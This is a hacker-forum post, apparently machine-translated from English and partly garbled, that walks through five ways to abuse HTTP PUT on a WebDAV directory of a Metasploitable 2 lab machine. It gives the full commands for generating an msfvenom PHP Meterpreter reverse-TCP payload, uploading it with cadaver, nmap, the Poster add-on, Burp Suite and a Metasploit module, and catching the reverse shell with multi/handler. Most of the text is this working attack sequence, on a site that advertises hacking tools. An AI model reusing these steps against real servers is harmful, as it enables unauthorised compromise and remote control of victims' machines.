渗透测试技巧:5种HTTP_PUT漏洞绕过方法

zevseo
30720zevseo大版主
2018-09-01 10:20:47
30720 2018-09-01 10:20:47
黑客话题: http_put httpput漏洞
今天的文章通过各种技术与绕过PUT方法漏洞有关。从 一篇文章中我们 看到了HTTP方法执行的不同操作,其中我描述了PUT方法的作用,它允许客户端在服务器上上传文件。现在我将利用这种方法上传恶意文件并使服务器受到攻击。
目标:Metasploitable 2
攻击者:Kali Linux
让我们开始!!!!
启动您的卡里Linux和Firefox的开放式受害者IP:192.168.1.4的url和点击WEBDAV。在这里,您可以看到它只显示父目录。现在打开终端,通过它执行以下命令。
首先确保服务器上的HTTP必须允许PUT方法,为了确认这一点,我们需要使用nikto扫描目标。
nikto -h http://192.168.1.4/dav
允许显示PUT方法的突出显示部分。现在是时候通过使用以下技术上传PHP恶意文件来破解服务器了。
准备要使用msfvenom上传的恶意文件:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f raw
将代码从<?php复制到die()并将其保存在扩展名为.php的文件中。我已将后门保存为桌面上的shell.php,稍后将浏览此文件以在Web服务器上上传。

现在通过在新终端上键入msfconsole来加载metasploit框架并启动multi / handler


尸体

Cadaver安装在kali中,这是支持在webdav上传和下载文件的命令行工具。
使用下面给出的第一个命令键入要上传文件的主机URL。
cadaver http://192.168.1.4/dav/
现在你在受害者的目录里。ü PLOAD的shell.php这里通过以下命令执行这两个命令可以让你上传您的文件目标机器上。
put /root/Desktop/shell.php
要验证文件是否已上载,请在浏览器上运行URL:192.168.1.4/dav恭喜!!!我们在Web服务器上得到了我们的文件shell.php
同时,打开metasploit并使用multi / handler。当它准备好利用时,返回上传的shell.php文件并单击它。
msf> use exploit/multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.5
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
Meterpreter就会> SYSINFO
它会给你一个预备会话。

NMAP

使用HTTP PUT方法将本地文件上载到远程Web服务器。您必须使用NSE参数指定文件名和URL路径。准备要上载的恶意文件nmap.php
nmap -p 80 192.168.1.4 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'

在结果中公开了nmap.php上传成功,现在让我们检查一下。
再次在浏览器192.168.1.4/dav中键入相同的URL 并使其运行。是的,我们在Web服务器上有我们的文件nmap.php。
同时,打开metasploit并使用multi / handler; 然后返回上传的nmap.php文件并运行它。
它还将为您提供一个仪表预备会话。

海报

从Firefox插件安装海报插件。作为海报,您可以使用以下参数执行HTTP请求:GET,POST,PUT和DELETE。准备要上传的恶意文件poster.php。点击 工具  从  菜单栏。然后从下拉菜单中单击 Poster 。将打开以下对话框。在这里,如屏幕截图所示,键入URL浏览您要上传的文件,然后单击  PUT  选项。此探索将向您显示   允许PUT方法,这意味着您可以通过它上传。
在浏览器192.168.1.4/dav中提供 URL以使其运行。我们在web服务器上获得了我们的文件poster.php。
总之,运行multi / handler; 然后返回上传poster.php文件并单击它。一个meterpreter会话将再次打开。
Burpsuite

打开  burp套件  ,不要忘记设置浏览器的手动代理。现在打开  代理选项卡  并点击 按钮上的拦截以捕获目标请求。完成此操作后,您将在拦截窗口下获取数据。
现在右键单击其窗口,将显示一个选项列表。再点击发送 转发器。
查看屏幕截图,您将分别找到左侧和右侧的两个面板,分别用于请求和响应
GET方法存在于请求标头中,我们需要PUT方法来上传文件。在这里,我将用PUT替换此方法。准备需要上传的恶意文件burp.php
在标题中键入PUT /dav/burp.php HTTP / 1.1,它将通过PUT请求上传dav目录下的burp.php文件。然后 在缓存控制之后 将php恶意代码<?php粘贴到  die()。请分别按照屏幕截图。
在浏览器192.168.1.4/dav中重复相同的URL 并使其运行。我们再次在Web服务器上获得了burp.php文件。
现在在metasploit重复相同的程序进行meterpreter会话,我们再次得到了受害者会话。


Metasploit的

此模块可以滥用配置错误的Web服务器,通过PUT和DELETE HTTP请求上传和删除Web内容。将ACTION设置为PUT或DELETE。PUT是默认值。如果未指定filename,则模块将为您生成随机字符串作为.txt文件。如果使用DELETE,则需要文件名。
use msf>auxiliary/scanner/http/http_put
msf>auxiliary (http_put) > set rhosts 192.168.1.4
msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp
msf>auxiliary (http_put) > set path /dav/
msf>auxiliary (http_put) > set filename meta.php
msf>auxiliary (http_put) > set filedata file://root/Desktop/meta.php
msf>auxiliary (http_put) > exploit

虽然它显示192.168.1.4不存在并且上传时出错。但是,/ dav索引 - Mozilla Firefox清楚地显示了meta.php已上传。  
在浏览器192.168.1.4/dav中运行相同的URL 。最后但并非最不重要的是,我们在web服务器上得到了我们的文件meta.php,这意味着metasploit的消息“上传可能失败”并非如此。

本文标题:渗透测试技巧:5种HTTP_PUT漏洞绕过方法
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2191.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan